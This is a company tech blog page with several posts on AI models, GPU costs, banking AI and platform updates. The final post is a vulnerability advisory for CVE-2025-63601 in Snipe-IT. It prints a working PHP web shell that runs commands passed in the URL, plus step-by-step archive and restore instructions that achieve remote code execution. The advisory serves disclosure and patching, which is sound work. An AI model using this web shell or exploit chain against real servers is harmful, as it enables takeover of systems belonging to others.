Blogs Tech

DeepSeek-V3.2-Speciale: A New Reasoning Rival for GPT-5 & Gemini-3.0?

11:38 31/12/2025
Less than a year after a knockout blow that stunned the AI industry, China’s DeepSeek is back with new open-source model and an ambitious set of claims that are turning heads across the tech world. The newly released DeepSeek V3.2-Speciale, fully open-source, is touted by the company as capable of competing with; and in some cases, even surpassing the biggest names today, including OpenAI’s GPT-5 and Google’s Gemini 3 Pro.  DeepSeek-V3.2-Speciale is a large language model that demonstrates exceptionally strong reasoning capabilities across mathematical, algorithmic, and logic-intensive evaluations. According to DeepSeek report, DeepSeek-V3.2-Speciale achieved gold-medal level performance in both the 2025 International Mathematical Olympiad (IMO) and the 2025 International Olympiad in Informatics (IOI), showcasing its capacity to tackle highly structured mathematical proofs and algorithmic problems with precision rarely seen in AI systems. Furthermore, its submissions to the ICPC World Finals 2025 reached top-tier placements, rivalling expert human competitors across timed programming challenges.  Table 1: Performance of DeepSeek-V3.2-Speciale in top-tier mathematics and coding competitions Key technical highlights  In comparisons with frontier models such as GPT-5, DeepSeek-V3.2-Speciale shows greater consistency in multi-step reasoning, clearer intermediate logic, and lower variance in problem-solving outputs. These characteristics make the model particularly effective on tasks where correctness, logical depth, and reasoning stability are critical, highlighting an important direction for progress in large language model reasoning performance.  What sets DeepSeek-V3.2-Speciale apart is not sheer scale alone, but a design focuses on efficient reasoning and problem decomposition. DeepSeek-V3.2-Speciale has been optimized through a combination of sparse attention mechanisms and a scalable reinforcement learning framework to deliver higher consistency and deeper multi-step reasoning in domains that require exact logical rigor.  Table 2: Benchmark performance and efficiency of reasoning models Across a range of reasoning-heavy benchmarks, DeepSeek-V3.2-Speciale consistently matches or outperforms GPT-5 High and Gemini 3.0 Pro, particularly on tasks that emphasize mathematical rigor and multi-step logical reasoning such as AIME 2025, HMMT Feb 2025, HMMT Nov 2025, and IMOAnswerBench.  Taken as a whole, the benchmark results suggest that DeepSeek-V3.2-Speciale has closed the reasoning gap with frontier models; and in several dimensions, moved ahead of them. Compared to GPT-5 and Gemini 3.0 Pro, DeepSeek-V3.2-Speciale shows stronger consistency on reasoning-intensive tasks, with fewer performance drop-offs across different problem distributions. Rather than excelling in isolated benchmarks, it delivers high, stable scores across mathematics, algorithmic reasoning, and competitive programming, indicating robustness rather than specialization in a single test format.  Relative to GPT-5, the results point to a clear trade-off: while GPT-5 remains broadly capable, its reasoning performance exhibits greater variance, whereas DeepSeek-V3.2-Speciale maintains more reliable accuracy on structured, multi-step problems. Against Gemini 3.0 Pro, which performs strongly on select benchmarks, DeepSeek-V3.2-Speciale distinguishes itself by sustaining top-tier performance across a wider range of reasoning evaluations, suggesting stronger generalization within the reasoning domain itself.  When to use DeepSeek-V3.2-Speciale  For practitioners, the implications are fairly clear once the nature of the task is defined. When the problem is pure reasoning on a bounded input such as proving a functional inequality, solving a difficult combinatorics problem, or designing a non-trivial algorithm from scratch. DeepSeek-V3.2-Speciale stands out as one of the strongest engines available.  However, real-world workflows often extend beyond this narrow but demanding class of problems. When a task begins to blend reasoning with broader context, such as drawing up-to-date world knowledge, large multi-file codebases, shell commands, browsing, or multimodal inputs, raw contest performance becomes less decisive. In these mixed workflows, the broader ecosystem and tool integration matter more, and systems like GPT-5.1-High, Gemini-3-Pro, Claude-Opus-4.5, or even standard V3.2-Thinking often deliver better end-to-end results.  Conclusion  In conclusion, DeepSeek-V3.2-Speciale demonstrates that frontier-level reasoning can be achieved through focused design rather than sheer scale. Its strong and consistent performance on mathematical and algorithmic benchmarks places it among the most capable reasoning models available today. While it is not a universal solution for every workflow, in bounded, reasoning-heavy tasks it sets a new bar for reliability and logical depth, pointing toward a more specialized and purposeful direction for future language models.  To experience DeepSeek-V3.2-Speciale, visit our website at AI Marketplace. New users will receive up to 100 million tokens to explore and evaluate this robust model on real-world reasoning tasks.  Get started with DeepSeek-V3.2-Speciale here: https://marketplace.fptcloud.com/en 

On-Premises vs. Cloud GPUs: Which Is More Cost-Effective?

13:32 30/12/2025
As AI, machine learning, and data science workloads continue to grow in scale and complexity, GPUs have become a critical piece of enterprise infrastructure. Now, organizations are mostly facing a fundamental decision: Whether to build and operate on-premises GPU clusters or adopt cloud-based platforms such as FPT AI Factory. While both options enable high-performance computing, their cost structures, scalability, and operational implications differ significantly. Understanding these differences is essential to help you choose your perfect fit.  Upfront Investment and Capital Efficiency  Buying powerful GPUs is often seen as the main hurdle, but it is only one piece of the puzzle. An on-prem GPU infrastructure requires a full supporting environment to operate reliably. This includes GPU servers, networking equipment, storage, supporting data center infrastructure, and experienced staff to maintain everything. High-performance GPUs can cost tens of thousands of dollars per unit, and production environments often require large clusters to support training, inference, and redundancy. Beyond hardware, organizations also absorb depreciation, long procurement cycles, and the risk of underutilized assets.  On the other hand, cloud providers like FPT AI Factory remove this upfront barrier by delivering GPU resources as a service. Instead of owning hardware, enterprises can access high-performance GPUs on demand, converting capital expenditure into operating expenditure with the pay-as-you-go model. This allows organizations to allocate budget more flexibly as needed to evolve.  Cost Factor  On-Premises GPU Cluster  Cloud GPU  Initial Hardware Investment  High upfront costs for GPUs, servers, and networking No initial investment, pay-as-you-go  Infrastructure Setup Requires data center space, power, and cooling No data center costs, resources managed Staffing Costs Dedicated IT staff for maintenance and monitoring Minimal IT staff required Maintenance & Upgrades Regular hardware replacements and software updates Managed by Cloud provider at no extra cost Operational Costs Fixed monthly power, cooling, and space expenses Variable, based on usage hours Flexibility & Scalability Limited by physical infrastructure Easily scalable, flexible resource allocation  Monthly Cost Estimate High (fixed costs, regardless of usage) Variable (based on active usage only)   To put it in perspective, a single H100 can cost up to $25,000 just for the card itself, and that's before the cost of the machine around it, data center amenities like cooling, data linkups, and hosting, as well as the expertise required to pay for its operation and maintenance, whereas you could rent that same H100 on FPT AI Factory for tens of thousands of hours and still not yet be at your break-even point.  Scalability and Performance in Practice  On-prem GPU environments are often seen as more stable in terms of performance, but that stability depends heavily on how well the system is designed and maintained. Network congestion, storage limitations, or insufficient cooling can quickly become bottlenecks, reducing performance even when powerful GPUs are in place.  Cloud GPU platforms are built to address these challenges by offering high-performance GPU instances, including dedicated options for demanding AI workloads. In practice, teams can achieve performance that matches or even exceeds self-managed clusters, without having to handle infrastructure on their own.  Moreover, scalability is also where cloud solutions clearly stand out. Teams can scale resources up for training, scale down after experiments complete, and switch between GPU types depending on the task. This is important for projects with different demands. On-prem systems, by contrast, are limited by the hardware already purchased, making rapid growth expensive and slow.  Efficiency and Resource Utilization  A common challenge with on-prem GPU clusters is low utilization. GPUs may sit idle during off-peak hours or between projects, yet still incur full operational costs.  Unlike that, cloud providers improve efficiency by allowing resources to be used only when needed. This is ideal for workloads such as batch data processing, model training cycles, experimentation, or inference with variable demand. Paying only for active usage helps eliminate waste and keeps costs aligned with actual work being done.  Considerations for Choosing Between Cloud and On-Premises Solutions  Although cloud-based GPUs generally offer greater flexibility and efficiency, the final decision should be driven by an organization’s specific workload characteristics and long-term strategy.  Workload duration and usage patterns play a critical role. Short-term, experimental, or highly variable workloads are better suited to cloud environments, where resources can be provisioned and released on demand. In contrast, stable and continuously running workloads may achieve better cost efficiency with on-premises GPU clusters.  Budget and operational resources are another key factor. Organizations with limited upfront capital or without specialized infrastructure teams often benefit from the cloud’s lower operational overhead and managed services. Meanwhile, enterprises that already operate data centers and possess dedicated IT staff may find long-term value in investing in on-premises hardware.  Scalability expectations should also be carefully evaluated. When rapid growth or unpredictable demand is anticipated, cloud solutions provide the agility to scale instantly without large capital investments. This allows organizations to align infrastructure expansion closely with actual business needs, rather than over-provisioning resources in advance.  By carefully evaluating these factors, organizations can select the deployment model that delivers the best balance between performance, cost efficiency, and scalability. 

FPT AI Factory in Review 2025: Taking the Lead in AI Innovation

11:48 24/12/2025
2025 marked a pivotal year for FPT AI Factory as we continued to advance our mission of building a sovereign, enterprise-grade AI infrastructure that empowers innovation, accelerates productivity, and supports the global AI community. Backed by a deep collaboration with NVIDIA as an NVIDIA Preferred Partner, FPT AI Factory has evolved into a comprehensive ecosystem for end-to-end AI development, serving enterprises, startups, and AI practitioners across multiple markets.  Driving AI Innovation at Scale  Throughout 2025, FPT AI Factory delivered tangible progress in scale, performance, and adoption. The platform successfully launched 43 AI services, covering the full AI lifecycle, from data processing and model training to deployment, inference, and monitoring.  One of the most significant milestones was the processing of 1,111 billion tokens across various AI workloads, enabling large-scale experimentation and production use of advanced language models. The platform also expanded its AI portfolio with 70+ AI models, including both internally developed models and leading open and commercial models, giving users the flexibility to build solutions tailored to their specific needs.  Empowering a Growing AI Community  Beyond technology, 2025 was about empowering people. FPT AI Factory became a trusted platform for a rapidly growing AI ecosystem, supporting 18,853 AI scientists, application developers, and AI engineers.  FPT AI Factory also played a critical role in nurturing innovation at the grassroots level, partnering with 20+ AI startups and providing the foundational infrastructure for more than 8 AI competitions. These initiatives not only helped discover new talents but also accelerated real-world AI applications, contributing to the long-term development of Vietnam’s AI ecosystem.  A Comprehensive Ecosystem for End-to-End AI Development  FPT AI Factory continued to strengthen its position as a one-stop platform for AI development, integrating infrastructure, tools, models, and services into a unified ecosystem. From scalable GPU computing and secure data environments to model marketplaces and deployment pipelines, the platform enables teams to move seamlessly from idea to production.  This holistic approach reflects FPT’s philosophy of “Build Your Own AI,” empowering organizations and individuals to develop, customize, and scale AI solutions independently, while maintaining full control over data, models, and deployment strategies.  New Product Highlight: AI Notebook  One of the most notable product launches in 2025 was AI Notebook. Built on NVIDIA-accelerated computing and the open-source Jupyter Notebook architecture, AI Notebook delivers a powerful, cloud-based coding workspace for AI engineers, developers, and researchers.  With one-click deployment and an embedded notebook gallery, AI Notebook significantly reduces setup time and complexity. Its cost-efficient model - free CPU usage with pay-as-you-go GPU pricing - allows teams to experiment freely while maintaining full cost transparency and control. With 400+ labs created in just one month, AI Notebook is on its way to becoming a preferred environment for rapid prototyping, experimentation, and model refinement.  Enterprise-Grade Security and Proven Quality  Security and trust remain our top priority. FPT AI Factory achieved and maintained a comprehensive set of international certifications, including ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27018:2019, PCI DSS, SOC 2, and SOC 3, ensuring the highest standards for information security, cloud governance, and data protection.  In terms of computing capability, FPT AI Factory continued to rank among the world’s leading AI infrastructures, reaching Top 36 globally for the Japan site and Top 38 globally for the Vietnam site. These rankings reflect the platform’s large-scale deployment of advanced GPU technologies, including NVIDIA H100 and H200, enabling high-performance AI workloads at enterprise and national scale.  Looking Ahead As we reflect on 2025, FPT AI Factory stands as more than just an AI platform. It is a foundation for innovation, a catalyst for productivity growth, and a strategic enabler for organizations seeking to lead in the AI era. With a robust ecosystem, strong community engagement, and a clear vision for sovereign and sustainable AI development, FPT AI Factory is well-positioned to drive the next wave of AI innovation in 2026 and beyond.  Together with our partners, customers, and the global AI community, we look forward to continuing this journey: building AI, shaping the future, and empowering innovation at scale. 

How AI is flipping “the pyramid” business model of the bank industry

10:55 24/12/2025
For decades, the banking business model followed a familiar pattern. The majority of investment in technology, people, and processes was directed toward the middle and back office. According to IBM, between two-thirds and three-quarters of total banking investment has historically gone into core systems, risk, finance, operations, and compliance. These investments were necessary to ensure stability, control, and regulatory adherence, but they came at a cost. Front-office functions such as customer experience, digital channels, ecosystems, platforms, and partnerships were often treated as secondary priorities rather than strategic drivers of growth.  Once a strength, now a limitation  Over time, this imbalance created a structural problem. Banks built increasingly complex and expensive operating environments, supported by monolithic core systems that were designed for control rather than change. Processes became rigid, highly customized, and deeply interdependent. As a result, even small changes to products, pricing, or customer journeys now require significant time, coordination, and cost. What was once a source of strength—scale and standardization—has become a constraint in a market that increasingly values speed, flexibility, and personalization.  These structural characteristics define the core limitations of the traditional banking business model today. High fixed costs make it difficult to compete with digital-native players that operate on lighter platforms. Legacy systems limit the ability to innovate quickly or integrate with external ecosystems. Customer experiences remain fragmented across channels, while personalization is constrained by both technology and organizational silos. Risk and compliance functions, built on static rules and historical data, struggle to keep pace with rapidly changing customer behavior and fraud patterns.  Reshaping the business model  By reducing complexity, increasing flexibility, and enabling intelligence across the front, middle, and back office, AI is beginning to change the economics and operating logic of banking itself.   Back office   Back-office processes such as document verification, KYC checks, and regulatory reporting consume significant resources. These tasks appear routine, but at scale they can create significant friction when a single customer onboarding process can involve dozens of documents and manual checks across multiple channels.   AI systems can directly address these tasks by automating cognitive, document-heavy work that was previously difficult to scale. It can now read, classify, extract, and validate information across large volumes of structured and unstructured data.   For example, JPMorgan Chase has deployed AI extensively across its operations and risk functions. One widely cited use case is COiN (Contract Intelligence), an AI system that reviews commercial loan agreements. Tasks that once required 360,000 hours of legal and operational work per year are now completed in seconds, with higher consistency and lower operational risk.  Middle office  In the middle office, AI is also transforming risk management and credit decisioning. Banks such as HSBC and ING have invested heavily in AI-driven models that analyze transactional behavior and unstructured data to support credit decisions and financial crime monitoring.  These systems continuously analyze transaction data, behavioral patterns, and external signals to deliver real-time, explainable risk insights. It also filters noise, prioritizes genuinely high-risk cases, and supports faster, more granular credit decisions.  Therefore, credit teams do not need to spend days decisioning, and fraud and AML teams do not need to manually review large volumes of alerts that ultimately prove to be false positives.  Front-office  In customer service, AI-powered assistants are no longer simple chatbots that follow predefined scripts. Modern systems can understand context, summarize long interaction histories, and resolve increasingly complex requests. Large retail banks that have deployed advanced AI assistants report that between 30 and 50 percent of customer inquiries are now handled without human intervention. This has reduced average handling times in call centers by as much as 40 percent, while allowing human agents to focus on higher-value interactions.  In short, AI is reshaping the banking operating model end to end, simplifying the back office, accelerating decision-making in the middle office, and elevating customer experience at the front. But these capabilities do not emerge in isolation.  For example, advanced customer-facing AI, such as modern chatbots that can understand complex, multi-step requests, and respond with context and accuracy, depends on far more than a standalone model. It requires a reliable pipeline to ingest data, train and fine-tune models, orchestrate inference, and enforce governance consistently across the organization. This is where the concept of an AI Factory becomes critical.  AI Factory: The Next Destination for the Financial Industry  An AI Factory provides the industrial backbone that enables AI to move from isolated pilots to enterprise-scale capabilities. It brings together data, models, compute power, security, and operational controls into a repeatable production environment. Without it, big banks will struggle to maintain consistency, explainability, and reliability, especially when AI is embedded across back, middle, and front office processes.  To be more specific, a chatbot that can handle complex customer requests relies on more than natural language understanding. It must access the back-office's data such as KYC and transaction history, apply middle-office risk and compliance intelligence, and respond in real time under strict accuracy and security controls. An AI Factory makes this possible by enabling continuous model training, real-time inference, and ongoing monitoring.  Across the global banking industry, leading institutions are already harnessing the power of AI factories to develop domain-aware AI for banking operations. According to NVIDIA, across Europe, banks are building regional AI factories to enable the deployment of AI models for customer service, fraud detection, risk modeling, and the automation of regulatory compliance. Specifically, in Germany, Finanz Informatik, the digital technology provider of the Savings Banks Finance Group, is scaling its on-premises AI factory for applications including an AI assistant to help its employees automate routine tasks and efficiently process the institution’s banking data.  In Asia, FPT launched FPT AI Factory in Japan and Vietnam, equipped with thousands of cutting-edge NVIDIA H100/H200 GPUs, delivering exceptional computing power. With this computational strength, banks are allowed to drastically reduce research time while accelerating AI solution development and deployment by more than 1,000 times compared to traditional methods. This helps enterprises reduce operating costs by up to 30 percent while accelerating the development of domain-specific AI applications, such as credit fraud detection systems, intelligent virtual assistants, by up to 10 times.

What’s New on FPT AI Factory

09:49 15/12/2025
We continue to advance the FPT AI Factory platform to improve scalability, performance, and operational efficiency. This release, as of December 12, 2025, introduces new features and optimizations designed to enhance the smoothness and efficiency of your workflows. FPT AI Studio Accelerate LLM workflows with new optimization techniques and gain real-time visibility through Grafana-integrated UI Logs. New feature 1. Full support for the Qwen3VL model Allow users to leverage state-of-the-art multimodal capabilities of the Qwen3VL model family for tasks such as visual understanding across AI Studio and related services. 2. Support Download Model Catalog by SDK Enable Model Catalog download via SDK gives developers a faster, automated way to integrate and manage models and improve workflow efficiency. AI Notebook Boost automation, ease of use, and performance, helping customers work faster and smarter with AI Notebook. New feature 1. Automated Lab Version Upgrade Remove manual steps for deleting old labs and remapping during version upgrades, saving time and reducing errors. 2. Event Notification Scheduling Enable scheduled system and feature announcements directly in AI Notebook, ensuring users stay informed without disruption. 3. Notebook Gallery Offer ready-to-use notebooks for common use cases across various topics, allowing quick reference and execution to accelerate development. 4. GPU Quota Control Introduce per-tenant GPU usage limits for better resource allocation and cost management, ensuring fair and efficient utilization. FPT AI Inference Achieve operational stability with new upgrades in LiteLLM engine, billing, kafka, and top-up services. New feature 1. Infrastructure & API Stability LiteLLM Upgrade: Enhance system resilience and processing efficiency with the upgraded LiteLLM architecture API Standardization: Ensure consistent data output and improved integration capabilities by optimizing and standardizing the v1/responses/ parameter. 2. Production Go-Live & Core Services Seamless Payments & Billing: Enjoy instant account top-ups and accurate, real-time service charge tracking. High-Performance Connectivity: Experience a faster, smoother platform with improved stability for real-time interactions. Enhanced User Feedback: Clearer interaction with upgraded popups providing instant status updates on your actions. Billing Foster real-time tracking, transparent cost insights, and a centralized dashboard for all usage-related information. New feature Product Usage: users can better manage budgets, optimize resource consumption, and make data-driven decisions with confidence. A centralized interface that displays: Total cost of all services. Real-time updates for the current billing period. Cost breakdown by product category: GPU Container, AI Inference, Model Fine-Tuning, Model Hub, and Interactive Session. Use case View total usage and spending across all FPT AI Factory services in a single, unified dashboard. Track detailed usage history (GPU Container, AI Inference, Model Fine-tuning, Interactive Session, Model Hub) by day, month, or year. Monitor real-time costs to prevent unexpected overspending and improve budget control.

Specialized AI: Delivering the Last Mile of Practical Intelligence

15:43 12/12/2025
Today, artificial intelligence is entering its own last mile. This phase of AI development is increasingly defined by specialized AI: systems designed and trained to accomplish a well-defined task or operate within a narrow domain. These models trade breadth for depth, focusing on performance, accuracy, and reliability in a specific area. And they represent the fastest-growing layer of the AI ecosystem.  Specialized AI stands in clear contrast to generalized AI—the broad-knowledge systems used by millions, such as ChatGPT, Claude, Gemini, or Perplexity. Generalized models are designed to handle an enormous range of questions and tasks, which makes them powerful, flexible, and easy to adopt across industries. However, this breadth also means they are not always the best fit for problems that demand deep domain expertise or strict accuracy. Work like clinical trial analysis, materials science modeling, algorithmic trading, or other high-stakes technical processes often requires a level of precision that broad models are not built to deliver.  Open Source and AI Agents: The Different Shapes of Specialized AI Developing targeted AI solutions requires the right technical components. Organizations can take several approaches:  AI Agentsbased onOpen-Source Models Teams can build agents customized for a specific function. Multiple agents can be orchestrated into a larger agentic system capable of handling multi-step, complex workflows. Retrieval-Augmented Generation (RAG) and Model Context Protocol (MCP) These tools allow developers to incorporate proprietary data and fine-tune models to handle domain-specific tasks with higher accuracy. Mixture of Experts (MoE) Architectures MoE models activate specialized sub-networks depending on the input. This design can achieve significantly higher performance. By engaging only the parts of the network needed for the task, this architecture often delivers up to 10x better throughput without sacrificing capability.  Small Language Models (SLMs) Because of their compact size, SLMs can be trained on highly specialized datasets and deployed efficiently while still offering strong performance for narrow tasks.  These examples represent only a portion of the approaches available for developing specialized AI solutions. In practice, many systems will combine several of these methods, while others may incorporate entirely different architectural elements depending on the requirements of the domain. Across the broader ecosystem, engineers are continuously designing new tools, refining model architectures, and advancing the underlying AI stack. Their work is expanding the range of what specialized AI can accomplish and enabling models to operate with greater precision, efficiency, and adaptability.  One of the keys to bridge the gap between generalized models and specialized AI solutions is utilizing foundation models and open-source toolsets, such as those offered by platforms like FPT AI Studio.  Built on a robust infrastructure powered by high‑performance GPUs and designed to support the full model development lifecycle, from data preparation and customization to deployment. This platform allows enterprises to fine-tune large language models and transform it into a true subject-matter expert in their own field.  Besides ensuring that models are tailored to reflect proprietary knowledge and operational needs, FPT AI Studio also enables faster inference and reduces computing costs, thereby helping organizations to achieve both technical precision and practical efficiency in their AI initiatives.  Specialized AI In Action  Specialized AI is already transforming industries, as enterprises, startups, and the entire ecosystem of developers build this final stage of the AI landscape.  For instance, PayPal is building agent-driven infrastructure to accelerate intelligent commerce. The agents will enable the first wave of conversational commerce experiences, where agents can shop, buy and pay on a user’s behalf, an interesting example of how specialized AI can work alongside generalized to accomplish specific tasks for individuals.  Synopsys is pioneering an agentic AI framework for semiconductor design and manufacturing. Built on tuned open-source models, the framework supports key stages of the chip development process, enhancing engineering productivity, improving design quality, and shortening time to market. This effort also contributes to broader innovation across the silicon-to-systems ecosystem.  Moreover, pharmaceutical companies are applying AI to drug discovery. Chemical companies are using it to explore new materials. Healthcare organizations are building models for disease-specific treatment. Financial institutions are deploying AI to detect market patterns and anomalies.   These examples represent only a fraction of what is emerging. The number of potential specialized AI applications is virtually unlimited. As more enterprises, researchers, and developers build open-source tools and advanced model architectures, specialized AI will continue to define the next wave of innovation.  Source: NVIDIA   

Is GPU Always Better? An Impact Assessment on AI Deployment Performance

15:17 02/12/2025
In the era of Artificial Intelligence (AI), selecting the right computing hardware is a pivotal decision that directly dictates the efficiency and economics of deployment. This article undertakes a detailed comparative analysis of the impact of the Graphics Processing Unit (GPU) and the Central Processing Unit (CPU) on the performance of AI models. Each processor type is designed with different architectural advantages, making them well-suited for specific tasks and performance requirements. Rather than viewing one as universally superior to the other, it’s more accurate to see them as complementary technologies that together shape the efficiency and scalability of AI workloads.  GPUs started out as processors for graphics rendering and became known as graphics cards, yet their abilities are now capable of much more than handling visuals. With recent advancements, such as the NVIDIA H100 and H200 GPUs, these processors have emerged as an indispensable powerhouse in the AI field, especially for complex Neural Networks, Deep Learning (DL), and Machine Learning (ML) tasks.   The NVIDIA H100 GPU introduced significant improvements in computational throughput and memory bandwidth, while the H200 further enhances efficiency, scalability, and AI-specific acceleration features. Both of these processors are designed with specialized tensor cores, large high-speed memory, and massive parallel processing capabilities which enable thousands of calculations to be performed simultaneously. These advancements unlock breakthroughs in fields such as computer vision, natural language processing, and generative AI.  On the other hand, CPUs offer strengths in versatility, sequential processing efficiency, and handling a wide variety of general-purpose tasks. They are essential for system orchestration, managing GPUs, and supporting lighter AI inference workloads. With strong single-thread performance and adaptability, CPUs continue to play a critical role in ensuring stability, responsiveness, and overall system balance.  Comparison of processing performance between GPUs and CPUs  GPUs deliver significantly higher processing performance for AI tasks thanks to its ability to handle thousands of parallel operations at once. This makes it much faster for deep learning training, large-scale inference, and workloads that rely heavily on matrix computations.  CPUs offer lower performance for heavy AI workloads but excel in single-thread speed and sequential processing. They are efficient for general-purpose tasks, system logic, and lighter AI inference, where responsiveness matters more than raw parallel power.  Analyzing latency differences of GPUs and CPUs for AI deployment  For large AI workloads, GPUs can handle data quickly, but for small or simple tasks, the overhead of transferring data to the GPU can introduce additional latency. They are most efficient when processing large batches rather than single requests.  Conversely, CPUs generally have lower latency for small-scale or real-time AI tasks since data can be processed immediately without transfer overhead. This makes them better suited for applications where quick response times are critical.  The flexibility of GPUs and CPUs  GPUs are specialized for parallel tasks, making them less flexible for general-purpose computing. While excellent for AI tasks like deep learning, they may not handle a wide range of workloads as efficiently as CPUs.  CPUs are more flexible and versatile, capable of handling a wide variety of tasks, including general-purpose AI computations. They can efficiently manage both single-threaded and multi-threaded tasks, making them ideal for a broader range of AI applications.  Cost Implications of GPUs and CPUs  Due to the specialized architecture and high performance, GPUs are generally more expensive than CPUs. The cost can be higher for both the hardware and the energy consumption when running large-scale AI tasks.  In comparison, CPUs offer a more cost-effective solution for smaller AI tasks or less resource-intensive applications. However, for large-scale AI, multiple CPUs may be needed to match the performance of a single GPU. For example, Cornell University’s studies show that running certain scientific computing or AI workloads on NVIDIA DGX-H100 can be about 80 times faster than running the same workload on 128 CPU cores, illustrating that tens or even hundreds of CPUs may be needed to match its throughput.  When to choose the right processor for AI workloads    When CPUs Are a Better Option  When GPUs Are a Better Option  Model Size  Suitable for small and lightweight models  Ideal for large models (LLMs, high-res vision models)  Parallelism Needs  Optimized for sequential tasks, limited parallelism  Highly efficient for tensor operations, massive parallelism  Type of Workload  Data preprocessing, logic-heavy tasks, light inference  Training large models, heavy inference, high-volume data processing  Scalability  Limited scaling for AI  High scalability for large-scale AI deployments  Typical Use Cases  Light inference, orchestration (Managing GPUs), traditional workloads, microservices  LLMs, high-resolution vision, video processing, real-time rendering, speech recognition, high-QPS services  Cost  More cost-effective, lower hardware and power costs  Higher cost due to specialized hardware and energy usage  AI workloads differ greatly, and not all require GPU acceleration. Smaller models like classical ML algorithms, or lightweight recommenders run well on CPUs without losing responsiveness. In contrast, large-scale models such as LLMs, VLMs, high-resolution image generators, and real-time speech systems depend on GPUs for the parallel processing and speed needed to operate effectively.   For example, modern LLMs like GPT-style models contain billions of parameters that must be processed in parallel to generate responses quickly. Running a 7B,13B model for tasks such as customer service chatbots, document summarization, or code assistance may still be feasible on CPUs in low-traffic environments, but once the model scales to 30B, 70B, or more, GPUs become essential to maintain acceptable response times, especially for production workloads.   Similarly, VLMs tasks like image captioning, real-time object recognition, or multimodal assistants for manufacturing and retail rely heavily on parallel tensor operations, making GPUs the only practical option. For example, a multimodal customer-support bot that interprets product images must leverage GPUs to process both visual embeddings and language outputs at speed.   Leveraging CPUs and GPUs Together  Both CPUs and GPUs are processing units that can handle similar tasks, but their performance varies depending on the specific needs of an application. Despite being more powerful, GPUs are not used to replace CPUs. Both are considered crucial individual units, each is actually a combination of various components designed and organized for different types of operations. Working with both together can cut costs while maximizing the output of artificial intelligence.  Several hybrid AI frameworks have been developed to integrate both CPUs and GPUs, optimizing efficiency by leveraging the strengths of each processor. CPUs handle simpler computing tasks, while GPUs are responsible for more complex operations.  For example, deep learning and machine learning require vast amounts of data to be processed and trained effectively. This data often needs significant refinement and optimization to ensure the model can interpret it correctly. These preliminary tasks are well-suited for a CPU, which can handle the basic processing and preparation of the data. Once the data is ready, the CPU can transfer it to the GPU, which takes over the more computationally intensive tasks, such as backpropagation, matrix multiplication, and gradient calculations. This division of labor allows CPUs to focus on less demanding tasks, while GPUs handle the heavy lifting required for training AI models efficiently. 

CVE-2025-63601: (Proof-of-Concept Included) Authenticated RCE via Backup Restore in Snipe-IT

17:20 28/11/2025
Safe Version: Snipe-IT 8.3.3 and later are not affected by this vulnerability. 1. CVE Reference For basic vulnerability information, please refer to: https://www.cve.org/CVERecord?id=CVE-2025-63601 https://nvd.nist.gov/vuln/detail/CVE-2025-63601 CVE-2025-63601 describes an issue where Snipe-IT’s backup restoration mechanism fails to properly validate file types and extraction paths inside uploaded archives, allowing an attacker to smuggle malicious executable files into web-accessible directories. This ultimately enables arbitrary code execution on the server. 2. How FPT AppSec Flagged the Issue & How Our Engineers Traced the Root Cause During internal security testing using FPT AppSec, the service highlighted a suspicious area within the Backup Restore feature of Snipe-IT. The scanner produced a warning related to improper file handling and potential for malicious file extraction inside the public/uploads directory. This indicated a possible Unrestricted File Upload or Archive Extraction Bypass vulnerability. From that point, our engineering team began a manual deep-dive investigation. By reviewing the Snipe-IT codebase and analyzing the flow produced by the scanner, we located the root cause inside: app/Console/Commands/RestoreFromBackup.php Missing extension validation for directory files The application defined allowed extensions but only applied them to a small subset of files (private/public logo files). Files inside directories extracted from the backup were never checked, meaning .php, .phtml, .htaccess, or any other executable file could be stored inside web-accessible directories such as: public/uploads/accessories/ public/uploads/assets/ Incorrect path whitelisting logic Certain upload directories were whitelisted without sufficient validation or constraint, enabling extraction of attacker-controlled files into the DocumentRoot. Direct RCE possibility Because the extracted files were placed under the public/ directory, they were directly accessible from the browser, resulting in instant remote code execution. The full chain matched the CVE description and confirmed a real-world exploit scenario. 3. Full Proof-of-Concept (PoC) This PoC is taken directly from our validated security report (included in the markdown file) and demonstrates the complete exploitation path. Step 1 - Prepare a Malicious Backup Archive Create a simple PHP web shell: [code lang="js"] cat > public/uploads/accessories/shell.php << 'EOF' <?php if(isset($_GET['cmd'])) { echo "<pre>"; system($_GET['cmd']); echo "</pre>"; } else { echo "Shell ready. Use ?cmd=command"; } ?> EOF [/code] Create a minimal SQL file required by the backup format: [code lang="js"] cat > database.sql << 'EOF' -- Snipe-IT Database Backup -- Generated for RCE PoC CREATE TABLE IF NOT EXISTS poc_test (id INT); INSERT INTO poc_test VALUES (1); EOF [/code] Package everything into a fake backup: [code lang="js"] zip -r ui_rce_backup.zip public/ database.sql [/code] This archive now contains:  [code lang="js"] public/uploads/accessories/shell.php ← malicious file database.sql ← valid structure [/code] Step 2 — Restore the Backup in Snipe-IT  Log in as an administrator.  Navigate to: Admin → Settings → Backups  Upload ui_rce_backup.zip  Click Restore (no need to clean database)  The application extracts the entire public/uploads/... structure, including your shell.php, without validating extensions.  As shown in the internal analysis screenshot, the file is written into: /var/www/html/public/uploads/accessories/shell.php   Step 3 — Execute Commands via the Web Shell  This confirms Remote Code Execution.  Conclusion  FPT AppSec Research Team successfully reproduced CVE-2025-63601 and demonstrated a real attack chain showing:  Archive entries were not validated  Dangerous executables were written directly to web-accessible directories  A simple PHP uploader inside the backup results in full RCE